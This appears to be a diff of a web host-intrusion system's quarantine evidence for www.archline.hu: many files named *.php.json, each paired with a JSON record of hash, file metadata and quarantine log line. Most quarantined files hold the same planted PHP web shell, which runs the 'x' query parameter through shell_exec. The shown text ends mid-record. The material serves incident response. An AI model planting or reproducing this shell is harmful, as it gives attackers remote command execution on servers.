diff --git a/var/www/hosting/archline.hu/www/56v68htl.php.json b/var/www/hosting/archline.hu/www/56v68htl.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/56v68htl.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/56v68htl.php.json.evidence.json b/var/www/hosting/archline.hu/www/56v68htl.php.json.evidence.json new file mode 100644 index 0000000..4257da5 --- /dev/null +++ b/var/www/hosting/archline.hu/www/56v68htl.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2866", + "log_excerpt": "[quarantine] www.archline.hu:56v68htl.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/56v68htl.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783782439, + "size": 57, + "uid": 20043 + }, + "rel_path": "56v68htl.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_032udz2d.php.json b/var/www/hosting/archline.hu/www/_h3x_032udz2d.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_032udz2d.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_032udz2d.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_032udz2d.php.json.evidence.json new file mode 100644 index 0000000..a487dc9 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_032udz2d.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2923", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_032udz2d.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_032udz2d.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783981803, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_032udz2d.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_06hpdsh3.php.json b/var/www/hosting/archline.hu/www/_h3x_06hpdsh3.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_06hpdsh3.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_06hpdsh3.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_06hpdsh3.php.json.evidence.json new file mode 100644 index 0000000..ca06035 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_06hpdsh3.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2885", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_06hpdsh3.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_06hpdsh3.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783969351, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_06hpdsh3.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_3ojeb2tw.php.json b/var/www/hosting/archline.hu/www/_h3x_3ojeb2tw.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_3ojeb2tw.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_3ojeb2tw.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_3ojeb2tw.php.json.evidence.json new file mode 100644 index 0000000..681cc67 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_3ojeb2tw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2840", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_3ojeb2tw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_3ojeb2tw.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783981583, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_3ojeb2tw.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_4llbsxi9.php.json b/var/www/hosting/archline.hu/www/_h3x_4llbsxi9.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_4llbsxi9.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_4llbsxi9.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_4llbsxi9.php.json.evidence.json new file mode 100644 index 0000000..7c241a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_4llbsxi9.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2874", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_4llbsxi9.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_4llbsxi9.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783973748, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_4llbsxi9.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_4poq79l5.php.json b/var/www/hosting/archline.hu/www/_h3x_4poq79l5.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_4poq79l5.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_4poq79l5.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_4poq79l5.php.json.evidence.json new file mode 100644 index 0000000..4acf39b --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_4poq79l5.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2868", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_4poq79l5.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_4poq79l5.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783961720, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_4poq79l5.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_53iofmnu.php.json b/var/www/hosting/archline.hu/www/_h3x_53iofmnu.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_53iofmnu.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_53iofmnu.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_53iofmnu.php.json.evidence.json new file mode 100644 index 0000000..d22ba70 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_53iofmnu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2857", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_53iofmnu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_53iofmnu.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783971847, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_53iofmnu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_5pvatqpr.php.json b/var/www/hosting/archline.hu/www/_h3x_5pvatqpr.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_5pvatqpr.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_5pvatqpr.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_5pvatqpr.php.json.evidence.json new file mode 100644 index 0000000..1b3ef72 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_5pvatqpr.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2824", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_5pvatqpr.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_5pvatqpr.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783843871, + "size": 45, + "uid": 20043 + }, + "rel_path": "_h3x_5pvatqpr.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_6ghs0oy0.php.json b/var/www/hosting/archline.hu/www/_h3x_6ghs0oy0.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_6ghs0oy0.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_6ghs0oy0.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_6ghs0oy0.php.json.evidence.json new file mode 100644 index 0000000..0f2c9b7 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_6ghs0oy0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2841", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_6ghs0oy0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_6ghs0oy0.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783972568, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_6ghs0oy0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_8jx3vwz3.php.json b/var/www/hosting/archline.hu/www/_h3x_8jx3vwz3.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_8jx3vwz3.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_8jx3vwz3.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_8jx3vwz3.php.json.evidence.json new file mode 100644 index 0000000..1d85894 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_8jx3vwz3.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2867", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_8jx3vwz3.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_8jx3vwz3.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 0, + "mtime": 1784073554, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_8jx3vwz3.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_gck6gi9k.php.json b/var/www/hosting/archline.hu/www/_h3x_gck6gi9k.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_gck6gi9k.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_gck6gi9k.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_gck6gi9k.php.json.evidence.json new file mode 100644 index 0000000..98f0460 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_gck6gi9k.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2932", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_gck6gi9k.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_gck6gi9k.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783962006, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_gck6gi9k.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_h6bm372h.php.json b/var/www/hosting/archline.hu/www/_h3x_h6bm372h.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_h6bm372h.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_h6bm372h.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_h6bm372h.php.json.evidence.json new file mode 100644 index 0000000..8dfc5f0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_h6bm372h.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2861", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_h6bm372h.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_h6bm372h.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783969568, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_h6bm372h.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_hi1odtqp.php.json b/var/www/hosting/archline.hu/www/_h3x_hi1odtqp.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_hi1odtqp.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_hi1odtqp.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_hi1odtqp.php.json.evidence.json new file mode 100644 index 0000000..5267299 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_hi1odtqp.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2916", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_hi1odtqp.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_hi1odtqp.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783971721, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_hi1odtqp.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_jbfyb73k.php.json b/var/www/hosting/archline.hu/www/_h3x_jbfyb73k.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_jbfyb73k.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_jbfyb73k.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_jbfyb73k.php.json.evidence.json new file mode 100644 index 0000000..f10c7fd --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_jbfyb73k.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2907", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_jbfyb73k.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_jbfyb73k.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 0, + "mtime": 1784073560, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_jbfyb73k.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_kqcc6eg4.php.json b/var/www/hosting/archline.hu/www/_h3x_kqcc6eg4.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_kqcc6eg4.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_kqcc6eg4.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_kqcc6eg4.php.json.evidence.json new file mode 100644 index 0000000..53d9d6f --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_kqcc6eg4.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2850", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_kqcc6eg4.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_kqcc6eg4.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783971710, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_kqcc6eg4.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_m1tsr0cw.php.json b/var/www/hosting/archline.hu/www/_h3x_m1tsr0cw.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_m1tsr0cw.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_m1tsr0cw.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_m1tsr0cw.php.json.evidence.json new file mode 100644 index 0000000..fc6f3c3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_m1tsr0cw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2826", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_m1tsr0cw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_m1tsr0cw.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783981562, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_m1tsr0cw.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_mo2gu1nm.php.json b/var/www/hosting/archline.hu/www/_h3x_mo2gu1nm.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_mo2gu1nm.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_mo2gu1nm.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_mo2gu1nm.php.json.evidence.json new file mode 100644 index 0000000..fc688ef --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_mo2gu1nm.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2872", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_mo2gu1nm.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_mo2gu1nm.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783969371, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_mo2gu1nm.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_pxw542fd.php.json b/var/www/hosting/archline.hu/www/_h3x_pxw542fd.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_pxw542fd.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_pxw542fd.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_pxw542fd.php.json.evidence.json new file mode 100644 index 0000000..8b7170d --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_pxw542fd.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2831", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_pxw542fd.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_pxw542fd.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841989, + "size": 45, + "uid": 20043 + }, + "rel_path": "_h3x_pxw542fd.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_r7txcnhr.php.json b/var/www/hosting/archline.hu/www/_h3x_r7txcnhr.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_r7txcnhr.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_r7txcnhr.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_r7txcnhr.php.json.evidence.json new file mode 100644 index 0000000..e09b3ae --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_r7txcnhr.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2828", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_r7txcnhr.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_r7txcnhr.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783841993, + "size": 45, + "uid": 20043 + }, + "rel_path": "_h3x_r7txcnhr.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_ssgc3jvw.php.json b/var/www/hosting/archline.hu/www/_h3x_ssgc3jvw.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_ssgc3jvw.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_ssgc3jvw.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_ssgc3jvw.php.json.evidence.json new file mode 100644 index 0000000..adb6cc2 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_ssgc3jvw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2921", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_ssgc3jvw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_ssgc3jvw.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 0, + "mtime": 1784078410, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_ssgc3jvw.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_ts1vwgdw.php.json b/var/www/hosting/archline.hu/www/_h3x_ts1vwgdw.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_ts1vwgdw.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_ts1vwgdw.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_ts1vwgdw.php.json.evidence.json new file mode 100644 index 0000000..d0e1d36 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_ts1vwgdw.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2918", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_ts1vwgdw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_ts1vwgdw.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783961714, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_ts1vwgdw.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_y7jjlahc.php.json b/var/www/hosting/archline.hu/www/_h3x_y7jjlahc.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_y7jjlahc.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_y7jjlahc.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_y7jjlahc.php.json.evidence.json new file mode 100644 index 0000000..5cbd27a --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_y7jjlahc.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2877", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_y7jjlahc.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_y7jjlahc.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783963099, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_y7jjlahc.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_yhdrz7g2.php.json b/var/www/hosting/archline.hu/www/_h3x_yhdrz7g2.php.json new file mode 100644 index 0000000..aabe0a0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_yhdrz7g2.php.json @@ -0,0 +1,7 @@ +' . shell_exec($_GET['x']) . ''; +} else { + echo 'SUCCESS: Shell is ready. Use ?x=command'; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_yhdrz7g2.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_yhdrz7g2.php.json.evidence.json new file mode 100644 index 0000000..52c58bd --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_yhdrz7g2.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2876", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_yhdrz7g2.php.json -> quarantined 